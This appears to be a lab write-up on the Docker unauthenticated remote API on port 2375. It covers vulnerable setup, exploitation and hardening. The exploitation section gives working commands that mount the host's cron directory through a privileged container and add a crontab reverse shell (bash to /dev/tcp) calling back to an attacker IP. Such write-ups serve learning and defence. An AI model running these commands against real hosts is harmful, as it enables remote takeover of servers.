Docker Unauthorized Access Vulnerability
Vulnerability Description
Malicious attackers can access Docker servers or containers without authorization. This can result in sensitive data leaks or allow attackers to perform unauthorized actions such as adding, modifying, or deleting containers.
Environment Setup
Install docker
yum install -y dockerModify the /usr/lib/systemd/system/docker.service service to start the API interface.
ExecStart=/usr/local/bin/dockerd -H tcp://0.0.0.0:2375 -H unix://var/run/docker.sock
Restart the docker service.
systemctl daemon-reload
systemctl restart docker
漏洞复现
Entering ip:2375/version will list basic information, the same effect as the docker version command.
Exploit Docker container to write a timed task to bounce a shell
We can use the unauthenticated Docker remote API to start a container and mount it to the root directory, thus giving us arbitrary read-write privileges. Then we write the reverse shell command into the crontab of the timed task, which can cause the host to bounce the shell.
[root@localhost ~]# docker -H tcp://192.168.32.183:2375 run -it --user root --privileged -v /var/spool/cron/:/var/spool/cron/ alpine shWrite to the schedule
/ # echo '* * * * * bash -i >& /dev/tcp/192.168.32.130/8088 0>&1' >> /var/spool/cron/root
Security Hardening
Do not enable the Docker remote API service unless necessary. If it is necessary, the following hardening methods can be used:
basicCopy codeSet ACLs to only allow trusted source IPs to connect;
Set TLS authentication, the official document for Protecting the Docker daemon socketAfter the certificate for communication between the client and server is generated, the following command can be used to start the Docker daemon:
docker -d --tlsverify --tlscacert=ca.pem --tlscert=server-cert.pem --tlskey=server-key.pem -H=tcp://10.10.10.10:2375 -H unix:///var/run/docker.sockLast updated